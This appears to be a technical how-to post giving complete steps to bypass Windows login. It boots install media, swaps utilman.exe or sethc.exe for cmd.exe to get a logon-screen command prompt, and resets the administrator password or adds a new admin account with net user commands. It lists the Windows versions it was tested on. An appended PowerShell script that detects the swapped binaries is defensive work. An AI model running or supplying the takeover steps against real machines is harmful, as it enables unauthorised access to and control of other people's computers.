Gain local admin password

Gaining a local admin password is rather simple on any machine that is not protected with BitLocker or otherwise protected against offline access.

Setup:
Have or make a bootable Windows 10 USB stick.

#1 Boot the Windows media and press Shift+F10 to get a command prompt
#2 Change directory to the local Windows drive: c:\windows\system32
#3 copy utilman.exe utilman.old
#4 copy cmd.exe utilman.exe

# Alternative: use sethc.exe instead, which is activated by pressing Shift 5 times.

#5 Reboot the computer and boot into Windows
#6 Press Windows + U and a command prompt will appear at the Windows logon screen, before logging in. (Or press Shift 5 times…)

#7 Change the current admin password with
net user administrator newpassword
net user administrator /active:yes

If needed, make a new account with
net user NewAdmin /add
net localgroup administrators NewAdmin /add
#8 Reboot and log in with the new/changed account

Cleanup:
This probably needs somewhat higher rights than usual (installer etc.).
Resetting it the same way you set it up above will always work.

# Start a command prompt as admin.
# Change directory to the local Windows drive: c:\windows\system32
del utilman.exe
copy utilman.old utilman.exe

Press Windows + U to check that the control comes up OK
Or press Shift 5 times if you are using sethc.exe

Tested and works on:
Windows Server 2016 Technical Preview 5
Windows 7
Windows 10 1909
Windows Server 2012 R2
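
To verify that a machine has not been left in the modified state from steps #3 and #4 (or that the cleanup worked), the following PowerShell check compares utilman.exe and sethc.exe against cmd.exe and looks for the leftover .old backup. It is an added example, not part of the original post; the function name Test-AccessibilityBinary is hypothetical, and it assumes an elevated PowerShell prompt on the machine being checked.

```powershell
# Added example (not from the original post). Run from an elevated PowerShell prompt.
# Test-AccessibilityBinary is a hypothetical helper name.
function Test-AccessibilityBinary {
    param(
        [string]$System32 = (Join-Path $env:SystemRoot 'System32'),
        [string[]]$Targets = @('utilman.exe', 'sethc.exe')
    )

    # SHA-256 of the shell that steps #3/#4 copy over the accessibility tool.
    $cmdHash = (Get-FileHash -LiteralPath (Join-Path $System32 'cmd.exe') -Algorithm SHA256).Hash

    foreach ($name in $Targets) {
        $path = Join-Path $System32 $name
        $findings = @()

        if (-not (Test-Path -LiteralPath $path)) {
            $findings += 'file is missing'
        } else {
            # Byte-for-byte copy of cmd.exe under the accessibility tool's name.
            if ((Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash -eq $cmdHash) {
                $findings += 'identical to cmd.exe'
            }
            # The version resource survives a rename, so it also catches a
            # cmd.exe copied from another Windows build whose hash differs.
            $original = (Get-Item -LiteralPath $path).VersionInfo.OriginalFilename
            if ($original -like 'cmd.exe*') {
                $findings += "OriginalFilename is '$original'"
            }
        }

        # Backup left behind by "copy utilman.exe utilman.old".
        $backup = [IO.Path]::ChangeExtension($path, '.old')
        if (Test-Path -LiteralPath $backup) {
            $findings += "backup copy $(Split-Path $backup -Leaf) present"
        }

        [pscustomobject]@{
            File     = $name
            Tampered = ($findings.Count -gt 0)
            Findings = $findings -join '; '
        }
    }
}

Test-AccessibilityBinary | Format-Table -AutoSize
```

A clean machine reports Tampered as False for both files; any finding means the logon-screen accessibility tools should be restored from a known-good source.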
